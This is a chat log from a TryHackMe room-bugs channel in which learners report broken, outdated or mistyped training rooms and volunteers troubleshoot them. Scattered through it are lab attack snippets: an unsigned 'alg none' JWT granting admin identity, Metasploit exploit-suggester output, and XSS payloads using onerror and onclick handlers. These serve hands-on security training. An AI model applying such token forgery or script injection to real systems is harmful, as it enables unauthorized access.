#room-bugs

Can the mods/admins not update someone else created room?

Admins yes, and a few of the rest of us, but it's not very polite

I know, kind of lacking of respect, but yeah, at the same time, it's to keep things up to date you know. It's after all not with bad intentions. And I would say, maybe these admins can add some note in that room that the admin has updated it to keep it current, up to date??

Looking at the profile of "stuxnet", creator of NAX room, seems (s)he is not active on the THM anymore

BTW, how is possible to reach level 998? And having finished only 52 rooms, being ranked at 5076. Only 5 badges... I have better scores and I'm only at level 12 😄

Everything above 13 (and below 1) is special roles that are given manually

0 = Admin
997 = Staff
998 = Contributor
999 = Bug Hunter

1337 = Lucky

Ah ok, thanks for the info! 🙂

Gave +1 Rep to @obsidian kiln

Shoot, I will never reach lever 14 😄

You will if more levels are added 🤷‍♂️

Hey, I've just started the Intro to ISACs room, and the VM's Windows license has expired. Task 8: https://tryhackme.com/room/introtoisac#

@dusky junco ^^ :)

Thanks 😄

this could be a problem as the VM is Windows 7

IIRC it had to be Windows 7 to run redline? There was a reason I picked Windows 7 Im not 100% positive of what it was though

こんばんわ from Jp.

I was doing "vulnversity" room. https://tryhackme.com/room/vulnversity

I could not upload rev php file to server on task4.
I selected a phtml file and submitted but it didn't finish uploading and then web browser showed error.

If you have the same problem and solved that, please tell me any advise.

Something is wrong with this room

I'm on day 1 and cannot get it to work

#site-support or #room-help first

Give it a bit longer to boot too.

Ah gotcha, okay thank you. I didn't know about the #site-support room. It finally booted for me, it was just strange. I pay for the subscription and I've never had a room take that long to boot before so I thought maybe something was wrong with it since it's an old room 😆 😅 but maybe the load is heavy this morning or something, thank you @eternal summit

Gave +1 Rep to @eternal summit

The VMs are not shared so load doesn't work like that

It's a heavy webapp for some reason

🧐 Interesting, good to know about how to VM's work though. I bet you're right, the webapp is probably heavier than I realized

Also I'd recommend not immediately assuming it's broken, usually rooms aren't and it's either user error or it just needs longer to boot.

Some rooms might even take 10 minutes to start fully

No problem 😁 this is a website about hacking and figuring out bugs, so I thought maybe I found one somehow 😆 I love THM and I've literally been using it every day for nearly 3 months, so when I thought I found a bug, I felt like I was being helpful to report it. I'll not do that in the future though if it's a big deal

Windows rooms are infamous for this, I think😆

Definitely lol, I know for sure I've had to wait longer for Windows rooms, but it's not really a big deal. When I use my personal Windows 10 VM it also takes forever to load in comparison to my Kali, Ubuntu and Parrot

So I figured that is to be expected, that's just when I go grab my coffee lol 😎

In burp suit room it says https://tryhackme.com/room/rpburpsuite
"For some additional practice on using Intruder, check out the older Learn Burp Suite room here on TryHackMe" the link doesn't work just points to this room has been made private

That room is deprecated. Use this instead:

https://tryhackme.com/module/learn-burp-suite

Thanks Muiri!!

Gave +1 Rep to @obsidian kiln

Thanks. I figured it was something like that.

The course is no longer available on udemy, TCM has moved it to his website

you might wanna fix this

Where is this? You gave no context

Room USTOUN
Fucking room, not fuction!
Port 1433 closed

5 Restart and not function

i think question 2 in task7 in owaspjuiceshop room is broken, or a least nee dsome updating, as burp made some change to the program which removed the "header" tab, so figure out where else you need to go to change what you need is not easy

I was doing "vulnversity" room. https://tryhackme.com/room/vulnversity And my burp dont have "Payload Position" option to use Sniper

@glad badger might be a good person to look into this

Thanks, I have noticed on the forum that many people complain about the same problem.

Gave +1 Rep to @viral cobalt

So, I'm VPN-ed in but can't connect to their target box with any tool. Can't proceed with training like this.

Not even complete ARP cache entry for target at 10.10.10.2

Where did you find this IP?
What did you mean by academic material?

Here. First it says enter the smbclient Syntax. https://tryhackme.com/room/networkservices

Then it says to browse around docs but 10.10.10.2 isn’t reachable.

I noticed there is an error with Linux fundamentals part 3, task 4. I noticed it says to start the python module "http.server". But there is no python module named that. I think what it's supposed to say is "SimpleHTTPServer" ? > python -m SimpleHTTPServer 8000

That is because of python2 and python3
You might have tried it with python2, which has SimpleHTTPServer
It has changed to http.server in python3 and since python2 is deprecated the room has provided instructions for python3

That's the wrong machine. The IP there was an example.

ok thanks

Gave +1 Rep to @obsidian kiln

Ah I see, cheers, thanks for that

Gave +1 Rep to @teal basalt

good morning!

Would someone verify what I'm seeing as a problem here? https://tryhackme.com/room/networkservices
You can't follow through with the guidance because 10.10.10.2 is not even on the network.

not sure if PEBKAC, but in the "Authenticate" i deploy the room VM and i can ping it, but when i try to go to the IP using FF, it says it's "unable to connect"

maybe it's blocking your source IP and you must pivot from another computer.

well, i recently completed it, so everything should work as far as i can remember

oh, so you could reach it before?

this is not that kind of room, it's a simple Authentication attack tutorial room

oic. wish I could help then.

remember, every time you spin up a new attackbox or room-vm, it will get a new IP, so i recommend tearing everything down and redeploying everything and see if it works then with a new ip

ok

I answered this already...

nope

it's still a problem with the page

it's like they forgot to stand up the .2 system to query with smbclient or other tools

As I said, 10.10.10.2 is an example IP. IT IS NOT the IP you should be connecting to. Do you understand?

Are you specifying the port?

Seems it was a ID10T error after all

*would give rp or whatever, but no clue how it works so, eh *

is the machine in Post-Exploitation Basics buggy? cause powershell is not recognizing any of the commands

smbclient //10.10.10.2/secret -U suit -p 445 (That last -p 445 is the port)

hint: smb

Again, that is an example. Do you understand?

You are not told to use that IP. Do not use that IP, it is the wrong IP.

I'm just reading the instructions. First it says 'suit' as the user, then to try Anonymous to see if it's permitted.

Deploy the target machine and use the IP of that target machine

No, you're misreading.

Maybe, but it says to browse around the target computer to see if anon is allowed. how am I misreading that?

Because you are assuming that it means 10.10.10.2

10.10.10.2 is nothing more than an example IP.

so what are we supposed to be targeting if not .2?

I recommend you walk backwards and get more familiar with how tryhackme works.
Machines aren't shared, you need to deploy them yourself.

The machine that you deploy in the appropriate task.

@agile sequoia I responded to you over email about this.. right?

Hey, i recog your handle. yes. got your note. didn't clarify the situation

The sentence says "look around for any interesting documents " using smbclient as anon. What system are they talking about if it's not the .2 they just mentioned?

You seem intent on ignoring any advice we try to give you.
Please actually take into account what we're saying, otherwise there's genuinely zero chance that you'll get 10.10.10.2 working.
Asking for help and then point-blank ignoring it is just plain rude.

My question isn't being answered in a way that matches the problem I'm seeing on the site.

-warn @agile sequoia Please follow Rule 18 - You're point-blank ignoring the advice you're getting from both THM support and volunteers.

⚠ Warned GregM#4160

lovely. well-done.

nm. bye

-mute @agile sequoia Please follow Rule 18 - You're point-blank ignoring the advice you're getting from both THM support and volunteers. Don't be rude to people trying to help you. The problem won't get solved if you ignore everyone that tries to help you.

🔇 Muted GregM#4160 for 1 day

I cant seem to find the issue, so I am placing it here as a possible bug.

In the Ice room, I am able to exploit Icecast and get onto the system. But when I do, the process is running as x86, which the answer calls for x64. Once I launch the exploit suggester, it launches for only x86 based systems. I receive only one hit back and it is not the correct answer as it is not looking for the right architecture. Is there something that I am doing wrong, or is there a bug in the setup of this machine?

Did you try migrate command?
You can migrate to a running process of a different (or same) architecture🙂

Let me give that a shot

Thanks!

You are awesome!

Thanks for the nudge! I used post/windows/manage/archmigrate and it worked like a charm!

Gave +1 Rep to @teal basalt

There is migrate command as well
It comes in handy during exploitation and/or privesc

Try the same archmigrate stuff with this command manually

Sounds good, I will try that.

I got it migrated, but its still not working...

I have a x64 meterpreter, but the local_exploit_suggester is only giving one result

Migrated to a x86 process?

No. I had an x86 process, and migrated to x64 as that is what the room calls for. But when I did that, I am still not getting the results from the local_exploit_suggester to answer the questions

IIRC, the local_exploit_suggester uses current context to use the available exploits
So if your current process is x86, it would test exploits for that
Similar for x64

Yeah, thats what I hoped would fix the issue when I migrated

I ran it before under the x86 context and only 1 exploit was shown, and its not the correct one.

This is the only one that shows up: "exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable."

meterpreter > run post/multi/recon/local_exploit_suggester

[] 10.10.x.x - Collecting local exploits for x86/windows...
[] 10.10.x.x - 4 exploit checks are being tried...
[+] 10.10.x.x - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.

That is the command and output

Alright, I will have to test myself.
I don't remember that room😅

lol, no worries

I really appreciate all the help

I am stuck good

I wish I could post screenshots here

You can

!docs verify

Well, another thing that worked!

Thanks!

Is your metasploit-framework up to date?😅

Yeah, I even did a dist upgrade as well

Try again

The process is x86

You sent me on another path I am trying

I just ran "searchsploit -u" to see if that helps

Will update when done

No dice. Same result after the update.

Throwback task 15 instructions are out of date.

I need help with Throwback and I'm not sure if it's a technical error. Please help me in channel #743859653343182930

seems there's also are issues in general with the "forced browsing" tasks in the "zthweb2" room as when i got to the [IP]:80 and login with the creds given in the task, i am forwarded to [IP]/note.php?note=1 while in the tasak screenshots it shows localhost/noot/note.txt,

i assumed localhostwas used when creating the room before importing everything over to THM, and normally you only need to replace localhost with [IP], to get it to work, but when i try do that by going to [IP]/noot/note.txt i just get a "Not Found" error from the php service

Drop into #room-help

Hi there, I want to report a bug, a flaw into the flaw on the authenticate room https://tryhackme.com/room/authenticate 😄 Tried to follow Task 4 JSON Web Token, the exorcise to get "Welcome user2: guest2". So the one before to play with the admin token, but I already got the admin flag.
(Don't ask me to much, because I don't understand this part very well. Confusing, even more with this bug 😛 )

I copy pasted that encoded "eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K.eyJleHAiOjE1ODY3MDUyOTUsImlhdCI6MTU4NjcwNDk5NSwibmJmIjoxNTg2NzA0OTk1LCJpZGVudGl0eSI6MH0K." as given on that room and have put that into the cookie with the devs tools. But I bet this is not supposed to give me the admin flag straight away. As I should have created (encoded) a new token. Or did I miss something?

Or is that flaw so simple like that as I pasted that in the cookie array at position 0 ?

Room? Task? Question?
Have you already asked in #room-help ? That would be the more appropriate channel unless you're absolutely certain it's a bug

I have no idea if it's a bug, I finished that Task 4, but to easy I think, as if I understood correctly, I should have created an new JSON token, modify the payload and set it to user id 0, which I did not do. I only copy pasted that encoded token as for the example for user2. But that gave me the admin flag on the run, which is not supposed to happen I think

I think i should have modified that payload
{"exp":1586620929,"iat":1586620629,"nbf":1586620629,"identity":2} to {"exp":1586620929,"iat":1586620629,"nbf":1586620629,"identity":0}

Or the room has an unknown spoiler?? that part: eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K.eyJleHAiOjE1ODY3MDUyOTUsImlhdCI6MTU4NjcwNDk5NSwibmJmIjoxNTg2NzA0OTk1LCJpZGVudGl0eSI6MH0K.

Let me check

Okay, spoiler alert into that room 😛 decoded that second part of that toke (with https://www.base64decode.org/) and indeed it's already set to userid 0

I confirm, it's a bug (spoiler) into the room

Since we placed the alg value to None we don't have to add a 3rd part or the encrypted value so we can just put a dot(.) after 2nd part and leave it like that. So the final string would look like:
eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K.eyJleHAiOjE1ODY3MDUyOTUsImlhdCI6MTU4NjcwNDk5NSwibmJmIjoxNTg2NzA0OTk1LCJpZGVudGl0eSI6MH0K.

That's what is noted into the room

Shoot, forget to copy one paragraph before the above one: "Notice how we changed the value of identity from 1 to 2."

To resume, the eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K.eyJleHAiOjE1ODY3MDUyOTUsImlhdCI6MTU4NjcwNDk5NSwibmJmIjoxNTg2NzA0OTk1LCJpZGVudGl0eSI6MH0K. is supposed to be for userid 2 while it is already for userid 0

Or the question should be modified "Use the same method to find identity of admin user and retrieve the flag?"

Because the job is already done

Could you follow my bad explanation? 😄

IDK if the timestamps are all broken but...?

I have no idea about what you are talking about. I'm a noob 😉

Well I understand, but that give an extra security flaw you mean?

No

https://en.wikipedia.org/wiki/JSON_Web_Token#Standard_fields

It is not about that, I think it's simple a user error of the author who have put a spoiler into his room

spoilers are not bugs

Because his so said token for user2 (this one from the room:
eyJleHAiOjE1ODY3MDUyOTUsImlhdCI6MTU4NjcwNDk5NSwibmJmIjoxNTg2NzA0OTk1LCJpZGVudGl0eSI6MH0K)

Is actually for userid 0

Decoding it and it confirmed it is {"exp":1586705295,"iat":1586704995,"nbf":1586704995,"identity":0}

Ok, that's a bug.
You stating it here could be considered a spoiler, but it's not a spoiler to have the token in the room be incorrect.

identity 0

They're also all expired but eh.

Well, that token is supposed to be the exercise for user2, which we actually not get, we directly get the admin flag

Yeah. It's a bug.
You've now reported it.

Don't feel offended or so please. Peace & Love...
I try to explain with my bad English that there's something not right, or not clear at all in that room

With that token i'm supposed to reach:

Now open the developer's tools in your browser and edit the stored cookie of the website to this new one and then just press the Go button and you'll notice that it will prompt "Welcome user2: guest2".

But I get the admin flag like show in the screenshot

@hazy hinge - There is a bug in Mitre room. Where in TASK 5 - Shield Active Defense.

Question :
Explore DTE0011, what is the ID where a defender can plant artifacts on a system to make it look like a virtual machine to the adversary
Answer : DUC0234 is correct answer

But it is not accepting it.

[DUC0234 A defender can plant files, registry entries, software, processes, etc. to make a system look like a VM when it is not.]

Thanks @hazy hinge for creating Mitre Room. I thoroughly enjoyed and learned a lot .. It was great experience in total 🙂 Kudos to you and tryhackme Team

Gave +1 Rep to @hazy hinge

Room: Android Hacking 101

I think this screenshot speaks for itself 🙂

@dry blade

Hi there, there's some little typo in the title/description of the XXE room https://tryhackme.com/room/xxe
Quoting it: "This room aims at providing the basic introduction to XML External entity(XXE vulnerability."

the webserver on https://tryhackme.com/room/overpass is not working

Can you provide more detail?

when i try to load the webpage on port 80 nothing happens

What is your VM IP?

It works fine. Try the MTU fix pinned in #site-support

I was going crazy myself trying to get it entered.

format error in the room Agent Sudo Task 5

Eh, not really if you take it less literally

You might want to change this now, because it's been a long time since msf6 has been out

"at time of writing" means what it sounds like

I know what it means, msf6 was released a while ago, so updating it wouldn’t hurt, anyway, that isn’t up to me, and I don’t want to fight, so I’ll just let it be

The whole room needs updating but it's hardly a bug

Got it

Hey, I think that I have found a bug,
In the room "Network Services" on task 4 it takes a wrong input as correct answer ( i did two "//" instead of one ) 😄

It's answer tolerance. 🙂

ah okay, nvm then 🙂

So, I might have found a bug, but I havent been able to verify it because 1) I cant find anybody on the same subnet of wreath as me and 2) I dont have the time to replicate it for the next 2 weeks. Basically the 2 times that I accidentally let the timer run out on wreath it does not allow me back in. Even after you start up the boxes and wait 5-10 mins they just never respond. I can reach the .250 ( VPN server ) but everything else is down.

Is there anybody that could verify this?

In OWASP juice shop task 8 there is no image only a border

Okay, Dont know if anybody did anything, but I see that my Network uptime reset without me pressing start. Thank you anonymous, because its working now ( as of 7 mins ago )

Room [Windows PrivEsc v1.0]: Having trouble with task 1 and 2 (today only, was working fine yesterday) from my parrot OS onto the windows VM. Can see my reverse shell binary on the network share from the Windows box, but cannot copy over, greeted with "Access denied" and sometimes "the specified network name is no longer available".
Tried troubleshooting by using the THM attack box, but the file directory does not exist for: /usr/share/doc/python3-impacket/examples/smbserver.py to host an SMB share. (potentially 2 seperate issues here)

installed impacket on the attackbox, and managed a reverse shell, so it must be an issue with my parrot OS, not sure what it could be

I think I might have found a bug in the Blaster room. We're apparently supposed to be looking at browser history, but it's empty except for the one file I viewed today.

In the Investigating Windows Room the last login date for "John" seems to be a big buggy, I copied it straight from the machine and it seems to not work.

Try UK format? DD/MM/YYYY ?

Isn't the format on the machine same as the one on the room?

Locales can be different, it might do some weird autodetection, I can't answer that

Ight I'll try

This question has become so much a pain to keep up with. Should be good now.

Ok. anyhow, the telnet exploit training page has a bug in the msfvenom syntax so it doesn't work. any idea who we can get to fix that? Can't proceed as is.

Please detail the bug

I tried -arch and -platform but no variation seems to work. States Error: The selected platform is incompatible with the payload

Screenshots.

msfvenom command missing -arch and -platform but no variation of what I've tried works.

It doesn't need them

It works as it is.

hmm. those errors we get aren't stop conditions to you?

Clearly not.

They're informational, telling you that it's selecting them automatically based on the payload

Usually errors stop the program from functioning, whereas this is just output/ wanrings*:)

I may not be smart enough for this stuff. 0_o

Not with that mindset!
It's difficult to get started with, just make sure to read everything clearly and google things you don't understand and you'll be fine:)

Something that a LOT of people seem to struggle with at the start is knowing the difference between something being broken and a small mistake they're making.
That difference is very important.
99.9% of the time, the content isn't broken.

ok man. Sorry for the head glitch two days ago. Had jumped back into the training and forgot the target VM IP was at the start of the sub-module.

Thanks though. see yas

What's that arch: cmd?
Is that an arch, I am unaware of😜

owasptop10 task 14 under breaking down how the DTD validates the XML, !element body: defines the 'body' element to be of type '#PCDATA'
'element' is highlighted when 'body' body should be highlighted like the terms above
not really a bug, but just a typo?

I am still struggling with the ICE room.

Here is a screenshot with the local_exploit_suggester

I only get one hit

And it is being run as an x86

I have migrated to a x64 meterpreter as well, still the same thing - only one result

Is it a "bug" that this is running as x86 or am I doing something wrong?

Well - It is an x86 binary (Seeing as how it's in C:\Program Files (x86)\)

So it'd stand to reason that escalating through it would give you an x86 shell

Not sure if this qualifies as a bug but I would like to share a problem I experienced and how I solved it.

In the room "Common Linux Privesc" I couldn't get the LinEnum script to run neither on the remote machine nor my local machine using the script in task 4 using wget https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh

I kept getting this error:

user3@polobox:~$ ./LinEnum.sh
./LinEnum.sh: line 7: syntax error near unexpected token newline' ./LinEnum.sh: line 7: <!DOCTYPE html>'
user3@polobox:~$

I found this comment by @plucky ginkgo

27/07/2021
@snow ravine ,These are the commands:
root@kali:~/Downloads/linenum# git clone https://github.com/rebootuser/LinEnum.git

This solved my issue and I was able to run the LinEnum.sh on my local machine and on the remote machine.

user3@polobox:~$ ./LinEnum.sh > output_LinEnum.txt
user3@polobox:~$

Did it work?

You wget a web page not the actual file that's the reason you see <!DOCTYPE html> in your output
Try to use the Raw link for the file in question

This one https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

It sure did, thank you for your help!

Gave +1 Rep to @plucky ginkgo

Aha! That makes sense. Thank you for explaining that!

In the room https://tryhackme.com/room/rpmetasploit
In the task 7
In the question 2
"Additionally, we can start a socks5 proxy server out of this session. Background our current meterpreter session and run the command search server/socks5. What is the full path to the socks5 auxiliary module?"

There is no ||auxiliary/server/socks5 || in metasploit anymore
There is auxiliary/server/socks_proxy now
Maybe this should be changed ?

it worked! Thanks

Gave +1 Rep to @hazy hinge

Not a bug per se but rather outdated instructions provided at the beginning of the Volatility room. It says that the tool can be installed via 'apt-get install volatility'. Well, it apparently can't be installed like this anymore so I figured I'd report it in case you think it's worth updating the copy. Edit: obviously apologies if this should've been posted in #site-bugs, I only noticed it after posting it here.

It's an issue with a room, it should go here, not #site-bugs

In the room https://tryhackme.com/room/mma
In the task 4
At the question : "What does Avast-Mobile can tell us about this software?"
The answer is the Avast details and not avast-mobile's

Yes, that is exactly what is happening. The issue is that the answers call for exploits meant for the x64.

Im not sure it is a bug, so much it is an issue with the room now. I am moving this to there.

In the Windows Event Logs room, task 4 question 4:

Execute the command from Example 8. Use Microsoft-Windows-PowerShell as the log provider. How many event ids are displayed for this event provider?

the website answer is ###, which is the results from running the command with '(Command).count or 'Command | measure' but not the actual number of events, these include whitespace at the end of the list of results and the lines at the beginning of the results with formatting info. actual answer is ###-4.
Discovered this before learning about the .count and | measure by running the command with 'Command > events.txt' and opening in notepad which shows the line count.

I think this is a bug

https://i.imgur.com/laeXeMc.png

the module corresponds to the CVE asked earlier

https://tryhackme.com/room/nax

task 1 q 8

even after copying the answer from a writeup, it doesn't work

checked 6 of them and none work

Is it exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce?
Someone mentioned this a few days ago🤔

Yep

Room: https://tryhackme.com/room/osqueryf8
Task: 4 (Schema Documentation)

All questions refer to the documentation here: https://osquery.io/schema/4.7.0/ (version 4.7.0)

Questions/Issues:
Q. How many tables are there for this version of Osquery?
=> System Expects: 266
=> Documentation Says: 271
Q. How many of the tables for this version are compatible with Windows?
=> System Expects: 96
=> Documentation Says: 98
Q. How many tables are compatible with Linux?
=> System Expects: 155
=> Documentation Says: 156

Is it possible the documentation has changed since the room was created?

Room: Sakura
Task: 2 TIP-OFF

Accepts partially wrong answer. Answer should be: "Sak**<snip>" but accepts "ak<snip>**"

(Also have screenshot)

Refresh the page -- that's just the intended answer tolerance

Thx. You are right! Sorry the bother.

Np 🙂

Hi! I also have this problem, it was not solved?

As far as I know, no.

room: YARA, https://tryhackme.com/room/yara
Task 6, 6,2 conditions. There
I tested locally and on the in-browser VM. the syntax in the picture using a $ instead of '#' causes YARA to fail. it should be #{variable_name}

$hello_world <= 10

checking 3.x and 4.x documentation, the syntax does not match the image in the room. Not sure if this is a typo or deprecated usage. https://yara.readthedocs.io/en/v3.4.0/writingrules.html#conditions

The number of occurrences of each string is represented by a variable whose name is the string identifier but with a # character in place of the $ character.

Hey, is there a bug in wonderland?

Nope.

I mean there might be, but it certainly won't affect your ability to complete the box

I haven't modified the room

Then maybe i am badly stuck at priv escalation part 😓

@hazy hinge @dusky junco I'm also having issues with room YARA Task 6.3. It will match text inside the file, but not the .txt extension of the filename

@dusky junco I appear to be having the same issue, in the same room as this message was discussing #room-bugs message

Every time I go to extend the session, it just goes poof

IP I was using is 10.10.78.110 and i think it was at 56 minutes remaining when i extended it

Hey! in the new version of metasploit, this exploit has ben changed.

to

https://tryhackme.com/room/thefindcommand task 8 answer is not being accepted despite being correct. I entered find / -type f -atime +10 -name "*.png" but it keeps saying my answer is incorrect

Bruh your username🙌

In the room Linux Fundamentals2 on the snipet example "Using ls to view hidden folders" it seems to be missing the -a argument
tryhackme@linux2:~$ ls .hiddenfolder folder1 tryhackme@linux2:~$

do we report typos here?

rumor has it @glad badger is the typo-fixer 👀

World famous typo fixer. 128 tpm. 🥳

having problems with the first question of the How websites work room. the answer should be Front End but it say incorrect

The answer was changed

The video is incorrect

ohhh

ok

Still having the same problem as i was last night with relevant, where it seems like it's dying after an hour

Yep, that's a bug with Windows machines that don't have the activation set right

It's been reported, the correct people have been made aware

ok, I saw a thing yesterday from like January where... someone said he thought he had fixed it

@eternal summit done thanks

Gave +1 Rep to @eternal summit

Thanks as always

Is the fact that the machine seems to hang fairly frequently for a few minutes related to that @eternal summit ?

That... that will not be

is it a known thing? I'm running gobuster, and every time i start getting time outs, pings also start failing, but eventually it comes back

I seem to remember having to be very very gentle with gobuster. How many threads are you using?

default i think it's 10

but it's been happening with every enum i do

That's not so normal. @dusky junco can you check the resources on Relevant please?

Here's what i'm seeing: First failure on gobuster: [ERROR] 2021/09/24 19:05:56 Context deadline exceeded or io timeout

Running a ping test in another terminal, on a 10 second interval:

[1632524744.848828] 64 bytes from 10.10.46.91: icmp_seq=8 ttl=125 time=86.0 ms
[1632524877.678213] 64 bytes from 10.10.46.91: icmp_seq=21 ttl=125 time=86.1 ms
[1632524887.687245] 64 bytes from 10.10.46.91: icmp_seq=22 ttl=125 time=85.0 ms

I had some issues but nowhere near that bad

notice it halts for ~100 seconds, from 4733 to 4877

Hi, I think I have an issue with the Alfred Room

There is an admin available ?

Ok I was stuck on the Task2 with the : Start-Process "shell-name.exe"

It was executed on the server but the revershell don't connect

So, my solution was to just enter : shell-name.exe

And it connect to the reverseshell

I don't know if you want to correct the instructions :). Have a nive day 😉

In the Kubernetes room, the second link in the second task leads to 404:
https://tryhackme.com/room/kuberneteschalltdi2020

Hi there 🙂
In the Metasploit Exploitation room, the password for the user "penny" isn't present in the given wordlist in the AttackBox. Not even in rockyou.txt..
Task: 2 / Question: 4
https://tryhackme.com/room/metasploitexploitation

Also in the Metasploit exploitation room, there isn't a download button to get the wordlist if you're using your own box. (Task 1)

I am working on Metasploit: Exploitation room Task: 2 , try to find an smb user password but given password file (/usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt) is unable to find password, how can I go on, trying another password file like rockyou.txt ??
Besides, it states that "please download the wordlist by clicking the Download Task Files button to the right" , good! but where is this button I could not find ??

Please see the screen caps in the link for ref. https://imgur.com/a/PNX3TiG

That button and the download icon aren't appearing in the live version right now

@severe ravine same issue for me, like @charred summit stated.

I managed download file with https://send-anywhere.com/ by the way.

got the wordlist, too. But the password for penny still isn't there..

you are right

NOW IT WORKED!!!!! lol

same problem with the password for user penny

oh what

is the password in the wordlist?

download the file from task 1, upper right corner 🙂

Thanks @severe ravine 🙂

Gave +1 Rep to @severe ravine

Thx @obtuse musk

Gave +1 Rep to @obtuse musk

All reappeared, plus wordlist with an extra line! 😂 Thanks for sorting that 👍

https://tryhackme.com/room/kuberneteschalltdi2020
The only port showing up is 22..
https://tryhackme.com/forum/thread/6091d69119b6c900482efb50

Gave +1 Rep to @obtuse musk

Gave +1 Rep to @severe ravine

are you using Metasploit?

hydra didn't work for me either. Try metasploit 😉

Gave +1 Rep to @obtuse musk

yep, it was lolol 🙂

No worries 🙂

@severe ravine thanks for fixing the issue dg, gg

Gave +1 Rep to @severe ravine

Okay, I'm doing more of Metasploit:Exploitation, and there is a task that involves generating reverse_shell.elf , Unfortunately I get Segmentation Fault when executing it

Hey this room has a bug, the wordlist provided has not the right password..

This is the room

Wordlist was recently updated

Try download a fresh copy

I report that a month ago nothing have change

Hello, I've a bug in this room
https://tryhackme.com/room/introtoshells
At Task 7 we learn about socat encrypted shells, and to do it we need socat on the target and our attack machine. So they suggest to save a pre-compiled binary of socat and host it on a python server then wget it on the target.
We must use OPENSSL args on both sides to succeed in connecting. But the pre-compiled binary linked in the room is not compiled with OPENSSL, and therefore can't be used to complete the connection.

@obsidian kiln this one's for you

Linux Fundamentals 2 https://tryhackme.com/room/linuxfundamentalspart2

Task 5: Although intimidating, these three columns are very important in determining certain characteristics of a file or folder and whether or not we have access to it. A file or folder can have a couple of characteristics that determine both what it is that and who we can do with it as -- such as the following:

Read
Write
Execute 

The diagram below is a great representation of how these permissions can be translated.

There is no diagram

rejetto http file server on steel mountain doesnt show up in any scans

the two servers are other ones

@dusky junco ^ whenever you get a chance

|_http-server-header: HFS 2.3
|_http-title: HFS /

from an nmap scan. hfs is rejetto httpfileserver (hfs) or googling hfs 2.3 gives results for rejetto

thanks (: cc @alpine tangle I might a chance to do this today, I'm still getting moved-in and unpacked at my new place. If not, I'll get to it tomorrow (:

Gave +1 Rep to @stuck stirrup

+rep @alpine tangle

ree

hello

the order of the tasks for this room is weird

https://tryhackme.com/room/hardeningbasicspart2

i guess it's an error

https://tenor.com/view/elmo-shrug-idk-i-dont-know-who-knows-gif-17348455

ohh

Intro to Windows > Task 6
When RDP'ing into the AD machine, Im brought right to a your password is expired and must be changed screen.
Attempting to change the password disconnects you from the RDP session. This does not happen in the walkthrough.

EDIT: This is possibly incorrect

Hey, is the password something like - ```
T ryhackme@123!

I think, there is one room that had an incorrect password.
The **space** shouldn't be there
It is already reported🤔

THM laggy, or is it me? Doing Linux 3, the ssh connection keeps dieing on me. Did rooms 1 and 2 with no problem

I did notice someone reported the same issue 2 weeks ago but it didnt seem like there was any discussion on the issue so I decided it was worth mentioning again.

The credentials provided are Administrator:Tryhackme123! no space anymore.

Password being expired isn't the same as the password being incorrect.

What RDP client are you using?

Remmina

Try a couple different ones

Xfreerdp works decently, as does rdesktop

If you can use the official Microsoft one on your OS, use that

Sure, but if the password change prompt is coming from the Windows machine, I'm not sure how changing the client would help.

Can't even connect with rdesktop

Failed to initialize NLA, do you have correct Kerberos TGT initialized ?
Failed to connect, CredSSP required by server (check if server has disabled old TLS versions, if yes use -V option).

because RDP is a hot mess

RDP when it's not a Windows official MS client and official Windows RDP server is a mess

Native windows RDP connects but same pwd change msg

Apologies for incorrect suggestion 😅
Recently I did a similar or the same room which had an incorrect password while it was already reported.
And I received the same output as presented by Soro
I might be mixing two rooms😅

So to recap:
Remmina - Connect, pwd must be changed
Rdesktop - No connection at all
Native RDP- Connect, pwd must be changed

Yeah it won't bypass it

But you should be able to go through with the change.

I get disconnected from the RDP session

just get booted out

@dusky junco

linux 3

only manual instructions, doesnt explain automation. Doesnt take much leg work to figure out its the enable option. Not even really a bug, idk... lol... Instructions say itll go over manual then automated, but doesnt. shrug Leaving this here just in case lol

In Filter Evasion Challenge 3 where Hello is filtered, I used <img src="" onerror="alert(String.fromCharCode(72, 101, 108, 108, 111))"> and got alert Hello but there is no flag received after it.
Kamalakannan D
—

Again for challenge 4 <img src=q onclick="alert(String.fromCharCode(72, 101, 108, 108, 111))"> this payload prompts Hello
But I didn't receive any flag

https://tryhackme.com/room/xss

https://tryhackme.com/room/metasploitexploitation In task 3 seems a span element got broken somehow and get displayed in the text as : span style="color:rgb(14, 16, 26);background:transparent;margin-top:0pt;margin-bottom:0pt">

Hi everyone, on https://tryhackme.com/room/malmalintroductory in Task 14 answer 2 might be wrong. Once I checked the MD5 file with virustotal, I received that the hash is not malicious, as I put "Nay" as an answer I have got "Wrong Answer"...

Hey, in the https://tryhackme.com/room/metasploitexploitation room there's a line "You can directly perform Nmap scans from the msfconsole prompt as shown belofasterw: "

I think that last word is a run together of "below faster".

Fixed. 👍

In the OWASP Top 10 room, task 26, the link doesn't go to a python script, it goes to a bunch of json.

https://gist.github.com/CMNatic/af5c19a8d77b4f5d8171340b9c560fc3

this page

You shouldn't be doing any rounding

Im just making a python script.

Math must be a use it or lose it thing xD

In Linux Fundamentals Part 2, Task 5, paragraph 3, the wording seems off.

A file or folder can have a couple of characteristics that determine both what it is that and who we can do with it as -- such as the following:

hello is there any bug in metasploit exploitation room

on windows basics 1, you can’t connect the Remote Desktop

In Overpass 2 I submitted a wrong flag and it accepted it as right.

Not sure if that's suppose to happen but I figured I'd pass it off anyway.

Answer tolerance

95% correct, the answer box will accept it

Refresh and it will update

Does anyone else have the problem with Corp not able to access the internet?
https://imgur.com/Y7kYRHL

Yep.
That applies over all of THM

@dusky junco I know you've been busy so I reworded it to A file or folder can have a couple of characteristics that determine both what actions are allowed and what user or group has the ability to perform the given action -- such as the following: If you don't approve please change it 😄

that box doesn't have internet access. only a select few rooms do

Was looking at the walkthroughs for https://tryhackme.com/room/ustoun

They all refer to mysql service however the port is closed when I port scan the machine

In Retro i am getting an error(12004 Winhttp internal error) when i try to transfer files to the target machine using Certutil or Invoke WebRequest.

The same command seems to work for others when i tried checking out writeups.Tried Resetting the machine multiple times but nothing seems to work.

https://tryhackme.com/room/meterpreter Section 2; Introduction to Metasploit: https://tryhackme.com/room/metasploitintro

